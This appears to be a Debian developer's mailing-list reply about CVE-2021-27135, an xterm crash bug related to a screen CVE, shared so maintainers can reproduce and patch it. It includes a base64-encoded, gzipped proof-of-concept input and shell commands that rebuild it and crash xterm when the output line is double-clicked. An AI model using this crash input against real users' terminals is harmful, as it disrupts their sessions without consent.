Hi,

Utkarsh Gupta wrote:
> On Wed, Feb 10, 2021 at 6:56 PM Utkarsh Gupta <utka...@debian.org> wrote:
> > I'll take care of fixing stretch and jessie and I am aware of all this
> > since I was the one who got this CVE assigned! :D
>
> Somewhat related, I also got CVE-2021-27135 assigned for xterm.
> I'll take care of the updates when the patch is available.
>
> But interestingly, while reproducing the issue in screen, you can also
> easily reproduce this issue in xterm. See [1].
>
> [1]: https://www.openwall.com/lists/oss-security/2021/02/09/7

Ick! And indeed, double clicking that line closes xterm. Ouch.

urxvt and kitty seem not affected — but also don't seem to render it
correctly either.

I btw. managed to get Taviso's crash with xterm (365-1 from Debian
Unstable) even shorter.

  $ base64 -d < CVE-2021-26937.poc.minimized | gzip -d - > test
  $ lynx -dump test | head -1

And then e.g. double clicking on the resulting line.

Compressed and base64 encoded:

H4sICO4NJGACA3Rlc3Qub25lbGluZQB72tb2EIT2P92//2F7H5gxA0hCRdr2gRlzkES2gxkTESLt
C0CMtl1IIu1gxnwkXbvAjM0IkdbNYMZiJF3rwYx2JJFWMGMmkjl7YGqaYeZsAzM2IemCSM1C0rUa
yOACAGPLp0/rAAAA

It doesn't crash an unpatched screen, though.

Actually when Tavis mentioned Thomas, I just wanted to test where I
have most contact with Thomas: Lynx. But I found no similar issues in
Lynx. :-)

		Regards, Axel
-- 
 ,''`.  |  Axel Beckert <a...@debian.org>, https://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
`. `'   |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5
  `-    |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE